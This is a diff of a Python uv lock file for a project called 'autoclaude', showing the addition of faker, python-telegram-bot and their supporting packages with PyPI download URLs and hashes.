requires-python = ">=3.12" requires-python = ">=3.12"
resolution-markers = [
"python_full_version >= '3.14'",
"python_full_version < '3.14'",
]
[[package]]
name = "anyio"
version = "4.12.1"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "idna" },
{ name = "typing-extensions", marker = "python_full_version < '3.13'" },
]
sdist = { url = "https://files.pythonhosted.org/packages/96/f0/5eb65b2bb0d09ac6776f2eb54adee6abe8228ea05b20a5ad0e4945de8aac/anyio-4.12.1.tar.gz", hash = "sha256:41cfcc3a4c85d3f05c932da7c26d0201ac36f72abd4435ba90d0464a3ffed703", size = 228685, upload-time = "2026-01-06T11:45:21.246Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/38/0e/27be9fdef66e72d64c0cdc3cc2823101b80585f8119b5c112c2e8f5f7dab/anyio-4.12.1-py3-none-any.whl", hash = "sha256:d405828884fc140aa80a3c667b8beed277f1dfedec42ba031bd6ac3db606ab6c", size = 113592, upload-time = "2026-01-06T11:45:19.497Z" },
]
[[package]] [[package]]
name = "autoclaude" name = "autoclaude"
@@ -8,12 +25,16 @@ version = "0.1.0"
source = { virtual = "." } source = { virtual = "." }
dependencies = [ dependencies = [
{ name = "curl-cffi" }, { name = "curl-cffi" },
{ name = "faker" },
{ name = "python-telegram-bot" },
{ name = "requests" }, { name = "requests" },
] ]
[package.metadata] [package.metadata]
requires-dist = [ requires-dist = [
{ name = "curl-cffi", specifier = ">=0.14.0" }, { name = "curl-cffi", specifier = ">=0.14.0" },
{ name = "faker", specifier = ">=36.0.0" },
{ name = "python-telegram-bot", specifier = ">=21.0" },
{ name = "requests", specifier = ">=2.32.5" }, { name = "requests", specifier = ">=2.32.5" },
] ]
@@ -163,6 +184,55 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/5c/7c/d2ba86b0b3e1e2830bd94163d047de122c69a8df03c5c7c36326c456ad82/curl_cffi-0.14.0-cp39-abi3-win_arm64.whl", hash = "sha256:2eed50a969201605c863c4c31269dfc3e0da52916086ac54553cfa353022425c", size = 1425067, upload-time = "2025-12-16T03:25:06.454Z" }, { url = "https://files.pythonhosted.org/packages/5c/7c/d2ba86b0b3e1e2830bd94163d047de122c69a8df03c5c7c36326c456ad82/curl_cffi-0.14.0-cp39-abi3-win_arm64.whl", hash = "sha256:2eed50a969201605c863c4c31269dfc3e0da52916086ac54553cfa353022425c", size = 1425067, upload-time = "2025-12-16T03:25:06.454Z" },
] ]
[[package]]
name = "faker"
version = "40.4.0"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "tzdata", marker = "sys_platform == 'win32'" },
]
sdist = { url = "https://files.pythonhosted.org/packages/fc/7e/dccb7013c9f3d66f2e379383600629fec75e4da2698548bdbf2041ea4b51/faker-40.4.0.tar.gz", hash = "sha256:76f8e74a3df28c3e2ec2caafa956e19e37a132fdc7ea067bc41783affcfee364", size = 1952221, upload-time = "2026-02-06T23:30:15.515Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/ac/63/58efa67c10fb27810d34351b7a10f85f109a7f7e2a07dc3773952459c47b/faker-40.4.0-py3-none-any.whl", hash = "sha256:486d43c67ebbb136bc932406418744f9a0bdf2c07f77703ea78b58b77e9aa443", size = 1987060, upload-time = "2026-02-06T23:30:13.44Z" },
]
[[package]]
name = "h11"
version = "0.16.0"
source = { registry = "https://pypi.org/simple" }
sdist = { url = "https://files.pythonhosted.org/packages/01/ee/02a2c011bdab74c6fb3c75474d40b3052059d95df7e73351460c8588d963/h11-0.16.0.tar.gz", hash = "sha256:4e35b956cf45792e4caa5885e69fba00bdbc6ffafbfa020300e549b208ee5ff1", size = 101250, upload-time = "2025-04-24T03:35:25.427Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/04/4b/29cac41a4d98d144bf5f6d33995617b185d14b22401f75ca86f384e87ff1/h11-0.16.0-py3-none-any.whl", hash = "sha256:63cf8bbe7522de3bf65932fda1d9c2772064ffb3dae62d55932da54b31cb6c86", size = 37515, upload-time = "2025-04-24T03:35:24.344Z" },
]
[[package]]
name = "httpcore"
version = "1.0.9"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "certifi" },
{ name = "h11" },
]
sdist = { url = "https://files.pythonhosted.org/packages/06/94/82699a10bca87a5556c9c59b5963f2d039dbd239f25bc2a63907a05a14cb/httpcore-1.0.9.tar.gz", hash = "sha256:6e34463af53fd2ab5d807f399a9b45ea31c3dfa2276f15a2c3f00afff6e176e8", size = 85484, upload-time = "2025-04-24T22:06:22.219Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/7e/f5/f66802a942d491edb555dd61e3a9961140fd64c90bce1eafd741609d334d/httpcore-1.0.9-py3-none-any.whl", hash = "sha256:2d400746a40668fc9dec9810239072b40b4484b640a8c38fd654a024c7a1bf55", size = 78784, upload-time = "2025-04-24T22:06:20.566Z" },
]
[[package]]
name = "httpx"
version = "0.28.1"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "anyio" },
{ name = "certifi" },
{ name = "httpcore" },
{ name = "idna" },
]
sdist = { url = "https://files.pythonhosted.org/packages/b1/df/48c586a5fe32a0f01324ee087459e112ebb7224f646c0b5023f5e79e9956/httpx-0.28.1.tar.gz", hash = "sha256:75e98c5f16b0f35b567856f597f06ff2270a374470a5c2392242528e3e3e42fc", size = 141406, upload-time = "2024-12-06T15:37:23.222Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/2a/39/e50c7c3a983047577ee07d2a9e53faf5a69493943ec3f6a384bdc792deb2/httpx-0.28.1-py3-none-any.whl", hash = "sha256:d909fcccc110f8c7faf814ca82a9a4d816bc5a6dbfea25d6591d6985b8ba59ad", size = 73517, upload-time = "2024-12-06T15:37:21.509Z" },
]
[[package]] [[package]]
name = "idna" name = "idna"
version = "3.11" version = "3.11"
@@ -181,6 +251,19 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/0c/c3/44f3fbbfa403ea2a7c779186dc20772604442dde72947e7d01069cbe98e3/pycparser-3.0-py3-none-any.whl", hash = "sha256:b727414169a36b7d524c1c3e31839a521725078d7b2ff038656844266160a992", size = 48172, upload-time = "2026-01-21T14:26:50.693Z" }, { url = "https://files.pythonhosted.org/packages/0c/c3/44f3fbbfa403ea2a7c779186dc20772604442dde72947e7d01069cbe98e3/pycparser-3.0-py3-none-any.whl", hash = "sha256:b727414169a36b7d524c1c3e31839a521725078d7b2ff038656844266160a992", size = 48172, upload-time = "2026-01-21T14:26:50.693Z" },
] ]
[[package]]
name = "python-telegram-bot"
version = "22.6"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "httpcore", marker = "python_full_version >= '3.14'" },
{ name = "httpx" },
]
sdist = { url = "https://files.pythonhosted.org/packages/cd/9b/8df90c85404166a6631e857027866263adb27440d8af1dbeffbdc4f0166c/python_telegram_bot-22.6.tar.gz", hash = "sha256:50ae8cc10f8dff01445628687951020721f37956966b92a91df4c1bf2d113742", size = 1503761, upload-time = "2026-01-24T13:57:00.269Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/13/97/7298f0e1afe3a1ae52ff4c5af5087ed4de319ea73eb3b5c8c4dd4e76e708/python_telegram_bot-22.6-py3-none-any.whl", hash = "sha256:e598fe171c3dde2dfd0f001619ee9110eece66761a677b34719fb18934935ce0", size = 737267, upload-time = "2026-01-24T13:56:58.06Z" },
]
[[package]] [[package]]
name = "requests" name = "requests"
version = "2.32.5" version = "2.32.5"
@@ -196,6 +279,24 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/1e/db/4254e3eabe8020b458f1a747140d32277ec7a271daf1d235b70dc0b4e6e3/requests-2.32.5-py3-none-any.whl", hash = "sha256:2462f94637a34fd532264295e186976db0f5d453d1cdd31473c85a6a161affb6", size = 64738, upload-time = "2025-08-18T20:46:00.542Z" }, { url = "https://files.pythonhosted.org/packages/1e/db/4254e3eabe8020b458f1a747140d32277ec7a271daf1d235b70dc0b4e6e3/requests-2.32.5-py3-none-any.whl", hash = "sha256:2462f94637a34fd532264295e186976db0f5d453d1cdd31473c85a6a161affb6", size = 64738, upload-time = "2025-08-18T20:46:00.542Z" },
] ]
[[package]]
name = "typing-extensions"
version = "4.15.0"
source = { registry = "https://pypi.org/simple" }
sdist = { url = "https://files.pythonhosted.org/packages/72/94/1a15dd82efb362ac84269196e94cf00f187f7ed21c242792a923cdb1c61f/typing_extensions-4.15.0.tar.gz", hash = "sha256:0cea48d173cc12fa28ecabc3b837ea3cf6f38c6d1136f85cbaaf598984861466", size = 109391, upload-time = "2025-08-25T13:49:26.313Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/18/67/36e9267722cc04a6b9f15c7f3441c2363321a3ea07da7ae0c0707beb2a9c/typing_extensions-4.15.0-py3-none-any.whl", hash = "sha256:f0fa19c6845758ab08074a0cfa8b7aecb71c999ca73d62883bc25cc018c4e548", size = 44614, upload-time = "2025-08-25T13:49:24.86Z" },
]
[[package]]
name = "tzdata"
version = "2025.3"
source = { registry = "https://pypi.org/simple" }
sdist = { url = "https://files.pythonhosted.org/packages/5e/a7/c202b344c5ca7daf398f3b8a477eeb205cf3b6f32e7ec3a6bac0629ca975/tzdata-2025.3.tar.gz", hash = "sha256:de39c2ca5dc7b0344f2eba86f49d614019d29f060fc4ebc8a417896a620b56a7", size = 196772, upload-time = "2025-12-13T17:45:35.667Z" }
wheels = [
{ url = "https://files.pythonhosted.org/packages/c7/b0/003792df09decd6849a5e39c28b513c06e84436a54440380862b5aeff25d/tzdata-2025.3-py2.py3-none-any.whl", hash = "sha256:06a47e5700f3081aab02b2e513160914ff0694bce9947d6b76ebd6bf57cfc5d1", size = 348521, upload-time = "2025-12-13T17:45:33.889Z" },
]
[[package]] [[package]]
name = "urllib3" name = "urllib3"
version = "2.6.3" version = "2.6.3"